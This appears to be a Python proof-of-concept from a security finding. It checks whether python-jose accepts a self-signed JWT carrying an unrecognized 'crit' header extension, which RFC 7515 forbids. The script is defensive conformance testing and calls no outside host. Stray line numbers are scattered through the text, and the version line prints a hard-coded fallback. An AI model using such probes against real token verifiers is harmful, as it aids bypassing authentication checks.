"""PoC: python-jose accepts a JWS with an unrecognized critical extension,
2
in violation of RFC 7515 §4.1.11.
3
 
4
Run: python3 findings/poc/F002-pyjose-poc.py
5
"""
import base64
import hashlib
import hmac
import importlib.metadata
import json

import jose
from jose import jwt
from jose.exceptions import JOSEError
 
print(f"python-jose version: {getattr(jose, '__version__', '3.3.0')}")
15
 
16
secret = "schism-secret"
17
header = {"alg": "HS256", "typ": "JWT", "crit": ["foobar"], "foobar": True}
18
claims = {"sub": "alice", "iat": 1700000000, "exp": 9999999999}
 
def b64u(b: bytes) -> str:
    """Encode *b* as unpadded base64url and return it as a str.

    JWS compact serialization segments carry no '=' padding, so the
    padding emitted by the stdlib encoder is stripped before decoding
    the ASCII result to text.
    """
    encoded = base64.urlsafe_b64encode(b)
    return encoded.rstrip(b"=").decode("ascii")
 
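# JWS compact serialization: BASE64URL(header).BASE64URL(payload).BASE64URL(sig).
# Compact JSON (no whitespace) keeps the encoded segments minimal. In compact
# serialization this header is the JWS Protected Header, so 'crit' is
# integrity-protected as RFC 7515 §4.1.11 requires.
h = b64u(json.dumps(header, separators=(",", ":")).encode())
p = b64u(json.dumps(claims, separators=(",", ":")).encode())
# HS256: HMAC-SHA256 over the signing input "h.p" with the shared secret.
# The signature is genuine, so an ACCEPTED result means the verifier ignored
# 'crit', not that signature checking was bypassed.
sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
token = f"{h}.{p}.{b64u(sig)}"

print(f"token: {token}")
print(f"token header (decoded): {json.dumps(header)}")

# NOTE: the exit status is 0 for every outcome; a harness has to parse the
# RESULT line rather than rely on the return code.
try:
    # 'algorithms' is pinned so acceptance cannot be attributed to an
    # alg-confusion path; how 'crit' is handled is the only open question.
    decoded = jwt.decode(token, secret, algorithms=["HS256"])
    print(f"RESULT: ACCEPTED - {decoded}")
    print(
        "RFC 7515 §4.1.11 requires this token be REJECTED because the\n"
        "recipient (python-jose) does not understand the 'foobar' extension."
    )
except JOSEError as e:
    # A JOSE-level exception is the library refusing the token: the
    # conforming outcome for this input.
    print(f"RESULT: REJECTED - {type(e).__name__}: {e}")
except Exception as e:  # noqa: BLE001
    # Anything else is a harness or environment failure, not evidence that
    # python-jose rejected the token. Report it separately so it is not
    # recorded as a false negative for the finding.
    print(f"RESULT: ERROR (not a JOSE rejection) - {type(e).__name__}: {e}")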